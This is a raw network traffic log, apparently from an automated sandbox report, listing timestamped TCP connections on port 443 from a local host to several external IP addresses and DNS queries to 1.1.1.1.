                                                                                                                  Oct 22, 2024 16:10:08.629728079 CEST49859443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:10:08.629753113 CEST44349859162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:10.687330008 CEST44349856162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:10.687436104 CEST44349856162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:10.687752962 CEST49856443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:10:10.688160896 CEST49856443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:10:10.688179970 CEST44349856162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:10.691445112 CEST49863443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:10:10.691502094 CEST44349863162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:10.691632032 CEST49863443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:10:10.691888094 CEST49863443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:10:10.691900015 CEST44349863162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:11.329379082 CEST44349863162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:11.331712961 CEST49863443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:10:11.331749916 CEST44349863162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:11.332093954 CEST44349863162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:11.333987951 CEST49863443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:10:11.334039927 CEST44349863162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:11.334166050 CEST49863443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:10:11.379333973 CEST44349863162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:11.475372076 CEST44349863162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:11.475450993 CEST44349863162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:11.475524902 CEST49863443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:10:11.476067066 CEST49863443192.168.2.16162.241.71.126
                                                                                                                  Oct 22, 2024 16:10:11.476083994 CEST44349863162.241.71.126192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:13.612353086 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:13.612409115 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:13.612489939 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:13.612721920 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:13.612745047 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.219825983 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.220204115 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.220263958 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.220633984 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.221072912 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.221146107 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.221343994 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.267337084 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.362302065 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.362397909 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.362427950 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.362459898 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.362488031 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.362490892 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.362510920 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.362540007 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.362570047 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.363166094 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.367690086 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.367749929 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.367775917 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.411636114 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.479906082 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.479984999 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.480042934 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.480072021 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.480232000 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.480257034 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.480292082 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.480300903 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.480343103 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.480890989 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.480940104 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.480986118 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.480988026 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.480995893 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.481034994 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.481722116 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.481832981 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.481920004 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.482008934 CEST49865443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.482024908 CEST44349865104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.484103918 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.484163046 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:14.484250069 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.484473944 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:14.484487057 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.100464106 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.100883961 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.100923061 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.101258039 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.101809978 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.101867914 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.102035999 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.147332907 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.249711990 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.249764919 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.249798059 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.249821901 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.249826908 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.249855042 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.249871969 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.249893904 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.249927998 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.249957085 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.249975920 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.249984026 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.250008106 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.250246048 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.250324011 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.250330925 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.305612087 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.369189024 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.369266987 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.369329929 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.369349003 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.369831085 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.369860888 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.369885921 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.369894981 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.369929075 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.370322943 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.370394945 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.370661974 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.370668888 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.370990992 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.371042967 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:15.371047974 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:15.416629076 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.498065948 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498188019 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498219013 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498281002 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498310089 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498315096 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.498347998 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498364925 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.498387098 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498409986 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.498415947 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498651981 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498681068 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498709917 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.498712063 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498718977 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.498725891 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.498770952 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.498780012 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.499181986 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.499211073 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.499239922 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.499247074 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.499382973 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.499412060 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.499442101 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.499453068 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.499463081 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.499669075 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.499730110 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.499737024 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.508086920 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.508140087 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.508178949 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.508234978 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.508245945 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.508373022 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.508780003 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.508862019 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.509735107 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.509795904 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.509865999 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.509919882 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.510720968 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.510838985 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.511213064 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.511274099 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.511375904 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.511439085 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.512099028 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.512164116 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.513117075 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.513179064 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.513191938 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.513225079 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:16.513240099 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.513281107 CEST49866443192.168.2.16104.18.95.41
                                                                                                                  Oct 22, 2024 16:10:16.513288021 CEST44349866104.18.95.41192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:18.719902039 CEST49869443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:10:18.719949961 CEST44349869172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:18.720139980 CEST49869443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:10:18.720308065 CEST49869443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:10:18.720318079 CEST44349869172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:19.736300945 CEST44349869172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:19.737948895 CEST49869443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:10:19.737963915 CEST44349869172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:19.738316059 CEST44349869172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:19.741157055 CEST49869443192.168.2.16172.217.16.196
                                                                                                                  Oct 22, 2024 16:10:19.741230011 CEST44349869172.217.16.196192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:19.788614035 CEST49869443192.168.2.16172.217.16.196
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Oct 22, 2024 16:08:13.853687048 CEST53630661.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:13.905011892 CEST53505841.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:14.894443989 CEST6143153192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:14.895265102 CEST5076053192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:14.905260086 CEST53507601.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:14.911990881 CEST53614311.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:15.248986006 CEST53642341.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:16.552371979 CEST5820453192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:16.552594900 CEST5265853192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:16.565355062 CEST53526581.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:16.589375019 CEST53582041.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:16.972189903 CEST6368953192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:16.972362995 CEST6082253192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:16.979674101 CEST53636891.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:16.979861975 CEST53608221.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:18.587902069 CEST6163153192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:18.588146925 CEST6116653192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:18.595365047 CEST53616311.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:18.596716881 CEST53611661.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:18.885857105 CEST5219253192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:18.886003017 CEST5182053192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:18.893510103 CEST53521921.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:18.894361973 CEST53518201.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:18.918145895 CEST5975953192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:18.918283939 CEST5802953192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:18.925607920 CEST53580291.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:18.926606894 CEST53597591.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.152196884 CEST5957353192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:23.152441025 CEST5803753192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:23.160640955 CEST53595731.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:23.160680056 CEST53580371.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:32.252108097 CEST53521941.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:34.529452085 CEST5367153192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:34.529452085 CEST5670953192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:34.529961109 CEST6042853192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:34.530271053 CEST6139453192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:34.530462027 CEST6188253192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:34.530810118 CEST5239353192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:34.531616926 CEST4985353192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:34.531987906 CEST6154653192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:34.531987906 CEST5556353192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:34.533410072 CEST6534353192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:34.536678076 CEST53536711.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:34.536911964 CEST53567091.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:34.537614107 CEST53613941.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:34.537646055 CEST53618821.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:34.537777901 CEST53523931.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:34.537874937 CEST53604281.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:34.538992882 CEST53498531.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:34.539416075 CEST53543451.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:34.540581942 CEST53615461.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:34.712285995 CEST53555631.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:35.117376089 CEST53653431.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:35.415704012 CEST6348753192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:35.415843010 CEST5276753192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:35.423439980 CEST53634871.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:35.424896955 CEST53527671.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:35.678461075 CEST5541953192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:35.678602934 CEST5896353192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:35.684140921 CEST5203453192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:35.684288979 CEST5080153192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:35.686736107 CEST53589631.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:35.687932968 CEST53554191.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:35.692060947 CEST53508011.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:35.692384958 CEST53520341.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:35.792469978 CEST6279353192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:35.792738914 CEST5190553192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:35.800148964 CEST53627931.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:35.800885916 CEST53519051.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:36.269324064 CEST53624161.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:38.175503969 CEST5760353192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:38.175695896 CEST5776553192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:38.182969093 CEST53576031.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:38.183834076 CEST53577651.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:39.047755957 CEST5523553192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:39.047970057 CEST6126953192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:39.069183111 CEST6171353192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:39.069466114 CEST5229653192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:39.228583097 CEST53522961.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:39.381602049 CEST53617131.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:39.571127892 CEST53552351.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:39.582309008 CEST53612691.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:41.761686087 CEST5103153192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:41.761686087 CEST6389553192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:41.771711111 CEST53638951.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:42.208178043 CEST53510311.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:44.816371918 CEST5645253192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:44.817833900 CEST5162053192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:44.824304104 CEST53564521.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:44.835549116 CEST53516201.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:44.921709061 CEST53630711.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.102493048 CEST6203753192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:46.102850914 CEST5651753192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:46.109882116 CEST53620371.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:46.111884117 CEST53565171.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:49.892224073 CEST5278253192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:49.892420053 CEST4982653192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:50.715080023 CEST53498261.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:50.797832966 CEST53527821.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:50.953213930 CEST53556591.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.351819992 CEST5123153192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:58.352092028 CEST5707953192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:08:58.359488964 CEST53570791.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:08:58.359678030 CEST53512311.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.244616032 CEST5912453192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:09:00.244832993 CEST5363053192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:09:00.253362894 CEST53536301.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:00.253597975 CEST53591241.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:13.311269045 CEST53545351.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:13.342360020 CEST138138192.168.2.16192.168.2.255
                                                                                                                  Oct 22, 2024 16:09:13.518318892 CEST53528941.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:13.854408979 CEST53609241.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:23.161029100 CEST5145553192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:09:23.161205053 CEST6523253192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:09:23.168668032 CEST53514551.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:23.169172049 CEST53652321.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:39.944484949 CEST5858653192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:09:39.944628000 CEST6126353192.168.2.161.1.1.1
